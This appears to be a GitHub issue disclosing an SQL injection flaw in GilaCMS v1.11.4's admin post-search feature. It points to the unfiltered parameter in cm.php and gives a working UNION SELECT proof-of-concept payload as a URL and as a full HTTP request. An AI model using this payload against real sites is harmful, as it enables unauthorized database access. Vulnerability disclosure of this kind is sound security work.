You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I installed the latest version of GilaCMS (v1.11.4). After the administrator log in to the website, the search for the sql injection vulnerability exists in the content->pages->posts page.
** Vulnerability related code**
The vulnerability related code is in lines 101 to 127 of /src/core/controllers/cm.php, the parameter $_GET is not filtered, and the line is directly brought into the getRows function to perform data query in line 122, resulting in sql injection.
Vulnerability certificate
Visit http://[address]:[port]/[app_path]/cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THB, you can see that the returned content has the result of the sql statement execution is 123456789
Send get packet
GET /cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THBL HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: */*
Referer: http://192.168.0.103/admin/content/post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=hmrt8hmf1v09krdr1p97f0sm93; GSESSIONID=1nnplwx30uiv7aiidh8tadishur4rta71nbxsuppk7w2szo2vh
Connection: close
I installed the latest version of GilaCMS (v1.11.4). After the administrator log in to the website, the search for the sql injection vulnerability exists in the content->pages->posts page.
** Vulnerability related code**
The vulnerability related code is in lines 101 to 127 of /src/core/controllers/cm.php, the parameter $_GET is not filtered, and the line is directly brought into the getRows function to perform data query in line 122, resulting in sql injection.
Vulnerability certificate
Visit http://[address]:[port]/[app_path]/cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THB, you can see that the returned content has the result of the sql statement execution is 123456789
Send get packet
Response package
The text was updated successfully, but these errors were encountered: